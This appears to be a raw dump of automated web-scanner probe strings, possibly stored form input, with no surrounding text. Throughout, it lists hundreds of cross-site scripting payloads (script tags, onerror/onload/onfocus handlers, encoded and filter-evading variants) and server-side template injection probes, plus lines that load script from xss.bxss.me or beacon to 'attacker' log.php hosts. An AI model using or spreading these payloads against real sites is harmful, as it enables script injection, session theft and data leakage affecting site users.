555<ScRiPt >gSCX(9910)</ScRiPt>

555<WNSSJO>CSICS[!+!]</WNSSJO>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

"}dfb{98991*97996}xca

555<ScRiPt >gzwv(9840)</ScRiPt>

"}"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb__${98991*97996}__::.x

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb[[${98991*97996}]]xca

555<ScRiPt >juyC(9880)</ScRiPt>

'}}dfb{{98991*97996}}xca

dfb{{98991*97996}}xca

555<ScRiPt >Rn7L(9398)</ScRiPt>

555<ScRiPt >8JQq(9134)</ScRiPt>

555<WBRH2H>ZJVMF[!+!]</WBRH2H>

555<W6UUWG>NYGCO[!+!]</W6UUWG>

555<ScRiPt >n44n(9162)</ScRiPt>

%35%35%35%3C%53%63%52%69%50%74%20%3E%6F%73%77%66%289155%29%3C%2F%73%43%72%69%70%54%3E

%35%35%35%3C%53%63%52%69%50%74%20%3E%34%41%4E%30%289195%29%3C%2F%73%43%72%69%70%54%3E

\xf6<img zzz onmouseover=3Vbp(96661) //\xf6>

555<W8SBF3>YEA6Z[!+!]</W8SBF3>

555<ifRAme sRc=9014.com></IfRamE>

555<WP8ZMG>ESC2A[!+!]</WP8ZMG>

555<script>Chml(9729)</script>

555<WGLLX5>BZTZE[!+!]</WGLLX5>

555<script>Vb8t(9099)</script>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb__${98991*97996}__::.x

555&lt

555<ScRiPt >41MI(9477)</ScRiPt>

555<ScRiPt >3LuS(9990)</ScRiPt>

555<WZITER>DGUYL[!+!]</WZITER>

555<WU8IAZ>AWRWE[!+!]</WU8IAZ>

dfb__${98991*97996}__::.x

'}}dfb{{98991*97996}}xca

555<script>DsuV(9836)</script>

555<WA1XBM>R9H8F[!+!]</WA1XBM>

'%}dfb{{98991*97996}}xca

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<script>OBma(9775)</script>

555<script>Chml(9499)</script>9499

555\u003CScRiPt\oswf(9487)\u003C/sCripT\u003E

555<aqu3xMD x=9888>

555<script>gSCX(9498)</script>

555<script>DW9d(9010)</script>

dfb[[${98991*97996}]]xca

"}dfb${98991*97996}xca

555<script>gzwv(9990)</script>

555<ScRiPt >dGnL(9888)</ScRiPt>

\xf6<img zzz onmouseover=rIEc(94851) //\xf6>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555\u003CScRiPt\4AN0(9546)\u003C/sCripT\u003E

555<script>DsuV(9845)</script>9845

555<script>gSCX(9854)</script>9854

'}dfb{98991*97996}xca

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

'%}dfb{{98991*97996}}xca

555&lt

555<WXVJOJ>WZTR1[!+!]</WXVJOJ>

555<WE2MJC>KXMZK[!+!]</WE2MJC>

555<script>juyC(9305)</script>

555<input autofocus onfocus=3Vbp(9400)>

555<script>Rn7L(9968)</script>

555<script>gzwv(9174)</script>9174

555<ScRiPt >ywDF(9710)</ScRiPt>

555<img sRc='http://attacker-9794/log.php?

555<script>DW9d(9215)</script>9215

555<WKWWRU>LHWYA[!+!]</WKWWRU>

dfb__${98991*97996}__::.x

555<ScR<ScRiPt>IpT>Chml(9967)</sCr<ScRiPt>IpT>

555<script>Vb8t(9164)</script>9164

555<script>8JQq(9241)</script>

555<WXAZZ4>NAGDB[!+!]</WXAZZ4>

"}dfb#{98991*97996}xca

555&lt

555<ScRiPt >T1o9(9899)</ScRiPt>

555<script>Rn7L(9845)</script>9845

'}dfb{98991*97996}xca

555<ScR<ScRiPt>IpT>Vb8t(9561)</sCr<ScRiPt>IpT>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<script>41MI(9841)</script>

<a HrEF=http://xss.bxss.me></a>

555<script>OBma(9185)</script>9185

\xf6<img zzz onmouseover=oswf(93981) //\xf6>

555<ScR<ScRiPt>IpT>DsuV(9010)</sCr<ScRiPt>IpT>

"}dfb{#98991*97996}xca

555<input autofocus onfocus=rIEc(9226)>

555<ScR<ScRiPt>IpT>DW9d(9528)</sCr<ScRiPt>IpT>

555<script>dGnL(9339)</script>

555<script>juyC(9714)</script>9714

555<ScR<ScRiPt>IpT>gzwv(9582)</sCr<ScRiPt>IpT>

555<ScR<ScRiPt>IpT>gSCX(9965)</sCr<ScRiPt>IpT>

'}dfb${98991*97996}xca

555<ScRiPt >Yu7W(9490)</ScRiPt>

555'"()&%<zzz><ScRiPt >qXNJ(9479)</ScRiPt>

555<ayV2EWj<

555<WKKR9V>D1R4C[!+!]</WKKR9V>

555<ScR<ScRiPt>IpT>Rn7L(9040)</sCr<ScRiPt>IpT>

555<script>n44n(9408)</script>

\xf6<img zzz onmouseover=4AN0(90421) //\xf6>

555<script>3LuS(9564)</script>

555<input autofocus onfocus=oswf(9892)>

555<ScRiPt >Vb8t(9919)</ScRiPt>

<a HrEF=jaVaScRiPT:>

555<ScR<ScRiPt>IpT>OBma(9618)</sCr<ScRiPt>IpT>

555<ScR<ScRiPt>IpT>juyC(9646)</sCr<ScRiPt>IpT>

555<ScRiPt >Chml(9333)</ScRiPt>

555<script>8JQq(9376)</script>9376

'}dfb${98991*97996}xca

555<script>3LuS(9917)</script>9917

555<input autofocus onfocus=4AN0(9135)>

555<ScRiPt >DsuV(9224)</ScRiPt>

555<W1VILV>SDDQY[!+!]</W1VILV>

555<script>dGnL(9925)</script>9925

555<ScRiPt >C2iz(9948)</ScRiPt>

555<script>41MI(9462)</script>9462

"}dfb{@98991*97996}xca

<a HrEF=http://xss.bxss.me></a>

555<ScRiPt >gSCX(9537)</ScRiPt>

555}body{zzz:Expre/**/SSion(3Vbp(9851))}

<a HrEF=http://xss.bxss.me></a>

555<ScRiPt >gzwv(9344)</ScRiPt>

555<ScRiPt >Rn7L(9645)</ScRiPt>

'}dfb#{98991*97996}xca

555<script>n44n(9540)</script>9540

'"()&%<zzz><ScRiPt >qXNJ(9327)</ScRiPt>

<a HrEF=jaVaScRiPT:>

555<WS5RMW>BNVMT[!+!]</WS5RMW>

555<ScR<ScRiPt>IpT>41MI(9237)</sCr<ScRiPt>IpT>

555<ScR<ScRiPt>IpT>8JQq(9317)</sCr<ScRiPt>IpT>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9384></ScRiPt>

555<ScRiPt >DW9d(9841)</ScRiPt>

555<ScRiPt >OBma(9869)</ScRiPt>

555<ScR<ScRiPt>IpT>3LuS(9996)</sCr<ScRiPt>IpT>

555<script>ywDF(9593)</script>

'}dfb#{98991*97996}xca

5556iRUC <ScRiPt >3Vbp(9389)</ScRiPt>

555<ScR<ScRiPt>IpT>dGnL(9462)</sCr<ScRiPt>IpT>

555<script>T1o9(9031)</script>

<a HrEF=http://xss.bxss.me></a>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9828></ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9389></ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9178></ScRiPt>

<a HrEF=jaVaScRiPT:>

555<ScR<ScRiPt>IpT>n44n(9323)</sCr<ScRiPt>IpT>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9814></ScRiPt>

555<ScRiPt >juyC(9170)</ScRiPt>

5559798978

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9015></ScRiPt>

555<ScRiPt >Chml(9213)</ScRiPt>

555<ScRiPt >dGnL(9544)</ScRiPt>

555<ScRiPt >Vb8t(9362)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9253></ScRiPt>

'}dfb{#98991*97996}xca

555<WXWKDX>MQJRT[!+!]</WXWKDX>

555<script>Yu7W(9928)</script>

"}}dfb{{=98991*97996}}xca

dfb__${98991*97996}__::.x

555<ScRiPt >8JQq(9075)</ScRiPt>

555<ScRiPt >n44n(9597)</ScRiPt>

555<ScRiPt >3LuS(9534)</ScRiPt>

555<ScRiPt >Rn7L(9654)</ScRiPt>

555<ScRiPt >41MI(9373)</ScRiPt>

555<ScRiPt >DsuV(9131)</ScRiPt>

<a HrEF=jaVaScRiPT:>

'}dfb{#98991*97996}xca

555}body{zzz:Expre/**/SSion(rIEc(9063))}

")dfb@(98991*97996)xca

555<script>C2iz(9531)</script>

'}dfb{@98991*97996}xca

555<W1ULFK>7T59R[!+!]</W1ULFK>

555<ScRiPt >OBma(9506)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9669></ScRiPt>

555<script>T1o9(9444)</script>9444

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9253></ScRiPt>

555<ScRiPt >gzwv(9497)</ScRiPt>

555<ScRiPt >gSCX(9902)</ScRiPt>

555<script>ywDF(9884)</script>9884

bfg1363\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl1363

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9058></ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9800></ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9435></ScRiPt>

555}body{zzz:Expre/**/SSion(oswf(9055))}

555<svg  \xa0onload=DsuV(9817)

555<svg  \xa0onload=Rn7L(9303)

'}}dfb{{=98991*97996}}xca

"%>dfb<%=98991*97996%>xca

'}dfb{@98991*97996}xca

555<svg  \xa0onload=OBma(9403)

555<ScR<ScRiPt>IpT>T1o9(9406)</sCr<ScRiPt>IpT>

555<script>Yu7W(9392)</script>9392

555<ifRAme sRc=9623.com></IfRamE>

555<ScR<ScRiPt>IpT>ywDF(9017)</sCr<ScRiPt>IpT>

555<svg  \xa0onload=Chml(9550)

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9385></ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9529></ScRiPt>

555<svg  \xa0onload=Vb8t(9983)

555noSxC <ScRiPt >rIEc(9530)</ScRiPt>

555}body{zzz:Expre/**/SSion(4AN0(9022))}

555<script>C2iz(9791)</script>9791

555<svg  \xa0onload=gSCX(9791)

555d4Vv7 <ScRiPt >oswf(9447)</ScRiPt>

555<ScRiPt >juyC(9405)</ScRiPt>

555<ScRiPt >n44n(9057)</ScRiPt>

'}}dfb{{=98991*97996}}xca

555<ScRiPt >dGnL(9063)</ScRiPt>

555<svg  \xa0onload=gzwv(9513)

555<ScRiPt >8JQq(9362)</ScRiPt>

bfgx9196\xc0\xbez1\xc0\xbcz2a\x90bcxhjl9196

555<isindex type=image src=1 onerror=DsuV(9309)>

555<ScR<ScRiPt>IpT>Yu7W(9922)</sCr<ScRiPt>IpT>

555<ScRiPt >BLFx(9167)</ScRiPt>

555<ScRiPt >DW9d(9186)</ScRiPt>

"}dfb#set($x=98991*97996)${x}xca

555<ScR<ScRiPt>IpT>C2iz(9182)</sCr<ScRiPt>IpT>

555<isindex type=image src=1 onerror=gSCX(9758)>

555<a0vTHVo x=9263>

555<ScRiPt >T1o9(9670)</ScRiPt>

')dfb@(98991*97996)xca

555<isindex type=image src=1 onerror=Rn7L(9986)>

555<isindex type=image src=1 onerror=OBma(9146)>

555<W3SPBZ>KJQHW[!+!]</W3SPBZ>

555omRYD <ScRiPt >4AN0(9660)</ScRiPt>

555<svg  \xa0onload=juyC(9770)

555<ScRiPt >3LuS(9730)</ScRiPt>

555<ScRiPt >ywDF(9836)</ScRiPt>

555<ScRiPt >41MI(9474)</ScRiPt>

555<isindex type=image src=1 onerror=Chml(9211)>

555<svg  \xa0onload=DW9d(9374)

555<ScRiPt >Yu7W(9838)</ScRiPt>

555<isindex type=image src=1 onerror=gzwv(9154)>

555<ifRAme sRc=9620.com></IfRamE>

<%={{={@{#{${dfb}}%>

555<iframe src='data:text/html

555<WEHKVI>HRYL1[!+!]</WEHKVI>

555<WZOFGG>BJG7G[!+!]</WZOFGG>

555<isindex type=image src=1 onerror=Vb8t(9553)>

'%>dfb<%=98991*97996%>xca

555<svg  \xa0onload=n44n(9467)

555<WCGIGV>IWHLL[!+!]</WCGIGV>

555<svg  \xa0onload=41MI(9569)

555<svg  \xa0onload=8JQq(9821)

555<ScRiPt >C2iz(9514)</ScRiPt>

555<img sRc='http://attacker-9643/log.php?

555<iframe src='data:text/html

555<iframe src='data:text/html

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9844></ScRiPt>

"}dfb{{"abc"|title}}xca

555<script>BLFx(9170)</script>

555<iframe src='data:text/html

555<iframe src='data:text/html

555<svg  \xa0onload=dGnL(9478)

555<isindex type=image src=1 onerror=n44n(9259)>

555<iframe src='data:text/html

555<amH5BhP x=9811>

')dfb@(98991*97996)xca

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9132></ScRiPt>

555<body onload=OBma(9532)>

555

555<isindex type=image src=1 onerror=DW9d(9816)>

555<isindex type=image src=1 onerror=41MI(9633)>

555<ifRAme sRc=9983.com></IfRamE>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9788></ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9109></ScRiPt>

555<ifRAme sRc=9042.com></IfRamE>

555<isindex type=image src=1 onerror=juyC(9299)>

555<body onload=Chml(9957)>

"print("dfb" . 98991*97996 . "xca")

555<ScRiPt >T1o9(9051)</ScRiPt>

555<svg  \xa0onload=3LuS(9327)

555<isindex type=image src=1 onerror=8JQq(9132)>

555<aUv5feN<

555<body onload=Vb8t(9710)>

555<isindex type=image src=1 onerror=dGnL(9265)>

555<ScRiPt >ywDF(9646)</ScRiPt>

555<img src=//xss.bxss.me/t/dot.gif onload=OBma(9521)>

555<iframe src='data:text/html

555<iframe src='data:text/html

<th:t="${dfb}#foreach

555<body onload=gSCX(9476)>

555<ScRiPt >Yu7W(9949)</ScRiPt>

555<img sRc='http://attacker-9543/log.php?

'}dfb#set($x=98991*97996)${x}xca

555<body onload=Rn7L(9804)>

555<isindex type=image src=1 onerror=3LuS(9868)>

555<iframe src='data:text/html

555<script>BLFx(9245)</script>9245

"98991*97996*98991*97996

555<img src=//xss.bxss.me/t/dot.gif onload=Chml(9372)>

555<iframe src='data:text/html

'%>dfb<%=98991*97996%>xca

555<body onload=DsuV(9155)>

555<iframe src='data:text/html

555<iframe src='data:text/html

555<ScRiPt >C2iz(9692)</ScRiPt>

555<img src=xyz OnErRor=OBma(9316)>

555<svg  \xa0onload=T1o9(9578)

555<svg  \xa0onload=Yu7W(9651)

555<body onload=juyC(9757)>

'}dfb#set($x=98991*97996)${x}xca

"}dfb{@math key=98991 method="multiply" operand=97996/}xca

555<ScR<ScRiPt>IpT>BLFx(9857)</sCr<ScRiPt>IpT>

555

555<img src=//xss.bxss.me/t/dot.gif onload=Vb8t(9330)>

555<svg  \xa0onload=ywDF(9055)

555<img src=//xss.bxss.me/t/dot.gif onload=DsuV(9306)>

555<svg  \xa0onload=C2iz(9798)

555<aa1Rcgj x=9138>

555<body onload=8JQq(9410)>

555<img src=//xss.bxss.me/t/dot.gif onload=gSCX(9543)>

555<a9E730c<

555<a9RCvXH x=9908>

555<body onload=gzwv(9058)>

555<img src=xyz OnErRor=Chml(9645)>

555<iframe src='data:text/html

555<img/src=">" onerror=alert(9490)>

555<isindex type=image src=1 onerror=Yu7W(9288)>

'}dfb{{"abc"|title}}xca

555<body onload=DW9d(9096)>

"}}}dfb{{{this}}}xca

'}dfb{{"abc"|title}}xca

555'"()&%<zzz><ScRiPt >6Wwb(9142)</ScRiPt>

555<img src=xyz OnErRor=DsuV(9077)>

555<iframe src='data:text/html

555<img src=//xss.bxss.me/t/dot.gif onload=juyC(9184)>

555<img src=//xss.bxss.me/t/dot.gif onload=Rn7L(9242)>

555<img src=xyz OnErRor=gSCX(9680)>

555<isindex type=image src=1 onerror=ywDF(9905)>

555<body onload=n44n(9457)>

555<body onload=41MI(9927)>

555<img src=//xss.bxss.me/t/dot.gif onload=gzwv(9494)>

555<img/src=">" onerror=alert(9464)>

555<img sRc='http://attacker-9010/log.php?

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<img src=xyz OnErRor=Vb8t(9787)>

555<isindex type=image src=1 onerror=T1o9(9767)>

555'"()&%<zzz><ScRiPt >rt12(9457)</ScRiPt>

555<isindex type=image src=1 onerror=C2iz(9903)>

555<img sRc='http://attacker-9049/log.php?

'print("dfb" . 98991*97996 . "xca")

555<img src=//xss.bxss.me/t/dot.gif onload=DW9d(9152)>

555<body onload=3LuS(9447)>

555<iframe src='data:text/html

555<body onload=dGnL(9253)>

555<img/src=">" onerror=alert(9606)>

555<ScRiPt >BLFx(9357)</ScRiPt>

555<img src=//xss.bxss.me/t/dot.gif onload=n44n(9789)>

555<iframe src='data:text/html

555<img/src=">" onerror=alert(9969)>

"}#{98991*97996*98991*97996}

555<img src=xyz OnErRor=juyC(9066)>

'print("dfb" . 98991*97996 . "xca")

555<img src=//xss.bxss.me/t/dot.gif onload=41MI(9719)>

'"()&%<zzz><ScRiPt >rt12(9382)</ScRiPt>

'"()&%<zzz><ScRiPt >6Wwb(9023)</ScRiPt>

555<img src=//xss.bxss.me/t/dot.gif onload=8JQq(9618)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%4F%42%6D%61%289395%29%3C%2F%73%43%72%69%70%54%3E

555<img src=xyz OnErRor=DW9d(9652)>

'98991*97996*98991*97996

555<img src=xyz OnErRor=gzwv(9748)>

555<img src=xyz OnErRor=Rn7L(9243)>

'98991*97996*98991*97996

555<iframe src='data:text/html

555<body onload=Yu7W(9225)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%43%68%6D%6C%289306%29%3C%2F%73%43%72%69%70%54%3E

555\u003CScRiPt\OBma(9063)\u003C/sCripT\u003E

%35%35%35%3C%53%63%52%69%50%74%20%3E%44%73%75%56%289172%29%3C%2F%73%43%72%69%70%54%3E

5559057710

%35%35%35%3C%53%63%52%69%50%74%20%3E%67%53%43%58%289780%29%3C%2F%73%43%72%69%70%54%3E

555<aME7Vbv<

555<body onload=ywDF(9032)>

555<img src=//xss.bxss.me/t/dot.gif onload=3LuS(9800)>

'}dfb{@math key=98991 method="multiply" operand=97996/}xca

"}dfb#{xca}=123

'}dfb{@math key=98991 method="multiply" operand=97996/}xca

555<img/src=">" onerror=alert(9249)>

555<aKyG4se<

555<img src=xyz OnErRor=41MI(9665)>

555

555<img src=//xss.bxss.me/t/dot.gif onload=dGnL(9092)>

5559760277

555<iframe src='data:text/html

555<img/src=">" onerror=alert(9052)>

555<img src=//xss.bxss.me/t/dot.gif onload=Yu7W(9821)>

555<img/src=">" onerror=alert(9294)>

555\u003CScRiPt\Chml(9055)\u003C/sCripT\u003E

555<img/src=">" onerror=alert(9159)>

555<img/src=">" onerror=alert(9023)>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9840></ScRiPt>

555<img src=xyz OnErRor=8JQq(9937)>

555<img src=xyz OnErRor=dGnL(9335)>

555<img src=xyz OnErRor=3LuS(9984)>

555<img src=xyz OnErRor=n44n(9866)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%44%57%39%64%289823%29%3C%2F%73%43%72%69%70%54%3E

555<body onload=C2iz(9596)>

'}}}dfb{{{this}}}xca

%35%35%35%3C%53%63%52%69%50%74%20%3E%6A%75%79%43%289759%29%3C%2F%73%43%72%69%70%54%3E

'}}}dfb{{{this}}}xca

"}}dfb{{'abcd'.toUpperCase()}}xca

555'"()&%<zzz><ScRiPt >zCaV(9559)</ScRiPt>

%35%35%35%3C%53%63%52%69%50%74%20%3E%56%62%38%74%289436%29%3C%2F%73%43%72%69%70%54%3E

bfg7208\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl7208

%35%35%35%3C%53%63%52%69%50%74%20%3E%52%6E%37%4C%289818%29%3C%2F%73%43%72%69%70%54%3E

555&lt

555\u003CScRiPt\DsuV(9202)\u003C/sCripT\u003E

555\u003CScRiPt\gSCX(9735)\u003C/sCripT\u003E

%35%35%35%3C%53%63%52%69%50%74%20%3E%67%7A%77%76%289551%29%3C%2F%73%43%72%69%70%54%3E

555'"()&%<zzz><ScRiPt >KFvT(9445)</ScRiPt>

555<ScRiPt >BLFx(9870)</ScRiPt>

555&lt

555<img src=//xss.bxss.me/t/dot.gif onload=ywDF(9309)>

bfg1865\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl1865

555<img/src=">" onerror=alert(9358)>

dfb{{98991*97996}}xca

555<body onload=T1o9(9208)>

555<img/src=">" onerror=alert(9489)>

555<img src=xyz OnErRor=Yu7W(9240)>

555\u003CScRiPt\DW9d(9052)\u003C/sCripT\u003E

'"()&%<zzz><ScRiPt >KFvT(9007)</ScRiPt>

555<img/src=">" onerror=alert(9456)>

555\u003CScRiPt\Vb8t(9124)\u003C/sCripT\u003E

'}#{98991*97996*98991*97996}

"}}AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

bfgx2018\xc0\xbez1\xc0\xbcz2a\x90bcxhjl2018

555<img/src=">" onerror=alert(9108)>

555\u003CScRiPt\Rn7L(9478)\u003C/sCripT\u003E

555\u003CScRiPt\juyC(9435)\u003C/sCripT\u003E

555&lt

555<img src=//xss.bxss.me/t/dot.gif onload=C2iz(9975)>

\xf6<img zzz onmouseover=Chml(93301) //\xf6>

555<img src=xyz OnErRor=ywDF(9699)>

555\u003CScRiPt\gzwv(9624)\u003C/sCripT\u003E

'"()&%<zzz><ScRiPt >zCaV(9288)</ScRiPt>

555<img/src=">" onerror=alert(9942)>

\xf6<img zzz onmouseover=OBma(90211) //\xf6>

'}#{98991*97996*98991*97996}

5559195014

555<img src=//xss.bxss.me/t/dot.gif onload=T1o9(9173)>

<%={{={@{#{${dfb}}%>

bfgx1394\xc0\xbez1\xc0\xbcz2a\x90bcxhjl1394

dfb[[${98991*97996}]]xca

555&lt

555&lt

555<svg  \xa0onload=BLFx(9458)

'}dfb#{xca}=123

%35%35%35%3C%53%63%52%69%50%74%20%3E%33%4C%75%53%289619%29%3C%2F%73%43%72%69%70%54%3E

'}dfb#{xca}=123

%35%35%35%3C%53%63%52%69%50%74%20%3E%38%4A%51%71%289246%29%3C%2F%73%43%72%69%70%54%3E

555<img/src=">" onerror=alert(9470)>

555&lt

555&lt

555<img/src=">" onerror=alert(9578)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%34%31%4D%49%289372%29%3C%2F%73%43%72%69%70%54%3E

555<img src=xyz OnErRor=T1o9(9306)>

555<img src=xyz OnErRor=C2iz(9288)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%6E%34%34%6E%289349%29%3C%2F%73%43%72%69%70%54%3E

"}}dfb{{98991*97996}}xca

5559181947

%35%35%35%3C%53%63%52%69%50%74%20%3E%64%47%6E%4C%289980%29%3C%2F%73%43%72%69%70%54%3E

555&lt

\xf6<img zzz onmouseover=gSCX(98471) //\xf6>

555<input autofocus onfocus=Chml(9169)>

<%={{={@{#{${dfb}}%>

%35%35%35%3C%53%63%52%69%50%74%20%3E%79%77%44%46%289994%29%3C%2F%73%43%72%69%70%54%3E

555<isindex type=image src=1 onerror=BLFx(9644)>

555&lt

555<input autofocus onfocus=OBma(9967)>

bfg3032\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl3032

dfb__${98991*97996}__::.x

\xf6<img zzz onmouseover=Rn7L(93661) //\xf6>

555

'}}dfb{{'abcd'.toUpperCase()}}xca

555\u003CScRiPt\8JQq(9763)\u003C/sCripT\u003E

\xf6<img zzz onmouseover=DsuV(90371) //\xf6>

'}}dfb{{'abcd'.toUpperCase()}}xca

\xf6<img zzz onmouseover=DW9d(95321) //\xf6>

555\u003CScRiPt\41MI(9107)\u003C/sCripT\u003E

\xf6<img zzz onmouseover=gzwv(91231) //\xf6>

%35%35%35%3C%53%63%52%69%50%74%20%3E%59%75%37%57%289913%29%3C%2F%73%43%72%69%70%54%3E

555\u003CScRiPt\n44n(9378)\u003C/sCripT\u003E

555<input autofocus onfocus=gSCX(9456)>

"}dfb[[${98991*97996}]]xca

555<img/src=">" onerror=alert(9140)>

555\u003CScRiPt\3LuS(9538)\u003C/sCripT\u003E

555<iframe src='data:text/html

'}}AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

bfg4251\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl4251

\xf6<img zzz onmouseover=juyC(90091) //\xf6>

555\u003CScRiPt\ywDF(9488)\u003C/sCripT\u003E

<a HrEF=http://xss.bxss.me></a>

555&lt

555

<a HrEF=http://xss.bxss.me></a>

555<input autofocus onfocus=gzwv(9170)>

555<input autofocus onfocus=Rn7L(9323)>

"dfb__${98991*97996}__::.x

'}}AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

555<img/src=">" onerror=alert(9230)>

\xf6<img zzz onmouseover=Vb8t(95031) //\xf6>

555<input autofocus onfocus=juyC(9729)>

555<input autofocus onfocus=DsuV(9096)>

bfgx8949\xc0\xbez1\xc0\xbcz2a\x90bcxhjl8949

555\u003CScRiPt\dGnL(9160)\u003C/sCripT\u003E

%35%35%35%3C%53%63%52%69%50%74%20%3E%43%32%69%7A%289564%29%3C%2F%73%43%72%69%70%54%3E

<a HrEF=http://xss.bxss.me></a>

555&lt

555&lt

555<input autofocus onfocus=DW9d(9576)>

<th:t="${dfb}#foreach

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555\u003CScRiPt\Yu7W(9200)\u003C/sCripT\u003E

<a HrEF=jaVaScRiPT:>

555<input autofocus onfocus=Vb8t(9772)>

<a HrEF=jaVaScRiPT:>

555&lt

555&lt

<th:t="${dfb}#foreach

bfgx4290\xc0\xbez1\xc0\xbcz2a\x90bcxhjl4290

%35%35%35%3C%53%63%52%69%50%74%20%3E%54%31%6F%39%289619%29%3C%2F%73%43%72%69%70%54%3E

'}}dfb{{98991*97996}}xca

<a HrEF=http://xss.bxss.me></a>

'}}dfb{{98991*97996}}xca

\xf6<img zzz onmouseover=8JQq(94441) //\xf6>

555\u003CScRiPt\C2iz(9589)\u003C/sCripT\u003E

555<body onload=BLFx(9705)>

\xf6<img zzz onmouseover=n44n(91071) //\xf6>

<%={{={@{#{${dfb}}%>

555

'}dfb[[${98991*97996}]]xca

<a HrEF=http://xss.bxss.me></a>

\xf6<img zzz onmouseover=ywDF(98451) //\xf6>

<a HrEF=http://xss.bxss.me></a>

<a HrEF=http://xss.bxss.me></a>

555&lt

555<ScRiPt >qXNJ(9114)</ScRiPt>

555<input autofocus onfocus=8JQq(9586)>

555&lt

<%={{={@{#{${dfb}}%>

'}dfb[[${98991*97996}]]xca

555\u003CScRiPt\T1o9(9815)\u003C/sCripT\u003E

"}"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<img src=//xss.bxss.me/t/dot.gif onload=BLFx(9429)>

555}body{zzz:Expre/**/SSion(OBma(9436))}

555}body{zzz:Expre/**/SSion(Chml(9412))}

\xf6<img zzz onmouseover=3LuS(93111) //\xf6>

555<input autofocus onfocus=n44n(9802)>

<a HrEF=http://xss.bxss.me></a>

'dfb__${98991*97996}__::.x

<a HrEF=jaVaScRiPT:>

<a HrEF=jaVaScRiPT:>

<a HrEF=jaVaScRiPT:>

<a HrEF=jaVaScRiPT:>

555

\xf6<img zzz onmouseover=dGnL(94041) //\xf6>

\xf6<img zzz onmouseover=41MI(99681) //\xf6>

555

555&lt

<a HrEF=http://xss.bxss.me></a>

<a HrEF=http://xss.bxss.me></a>

555<input autofocus onfocus=ywDF(9070)>

555<img src=xyz OnErRor=BLFx(9778)>

555CYGKG <ScRiPt >Chml(9566)</ScRiPt>

<a HrEF=jaVaScRiPT:>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

'}}dfb{{98991*97996}}xca

555<WKMLOM>WDQSC[!+!]</WKMLOM>

<th:t="${dfb}#foreach

'dfb__${98991*97996}__::.x

\xf6<img zzz onmouseover=Yu7W(97321) //\xf6>

555}body{zzz:Expre/**/SSion(gzwv(9743))}

555}body{zzz:Expre/**/SSion(gSCX(9880))}

\xf6<img zzz onmouseover=C2iz(94281) //\xf6>

555<input autofocus onfocus=dGnL(9086)>

555m4Kzp <ScRiPt >OBma(9812)</ScRiPt>

555&lt

555}body{zzz:Expre/**/SSion(DsuV(9041))}

555

<a HrEF=jaVaScRiPT:>

555<input autofocus onfocus=3LuS(9765)>

'}"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

<a HrEF=http://xss.bxss.me></a>

'}"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555

555<input autofocus onfocus=41MI(9219)>

555<WQOQ6B>CJK5O[!+!]</WQOQ6B>

<a HrEF=http://xss.bxss.me></a>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

5559UrTL <ScRiPt >gSCX(9374)</ScRiPt>

555<img/src=">" onerror=alert(9988)>

555}body{zzz:Expre/**/SSion(Rn7L(9877))}

555KhhjZ <ScRiPt >gzwv(9388)</ScRiPt>

<a HrEF=jaVaScRiPT:>

5556iHpC <ScRiPt >DsuV(9903)</ScRiPt>

'%}dfb{{98991*97996}}xca

\xf6<img zzz onmouseover=T1o9(95851) //\xf6>

555

555<input autofocus onfocus=Yu7W(9396)>

<a HrEF=jaVaScRiPT:>

555}body{zzz:Expre/**/SSion(juyC(9493))}

<a HrEF=http://xss.bxss.me></a>

555}body{zzz:Expre/**/SSion(Vb8t(9721))}

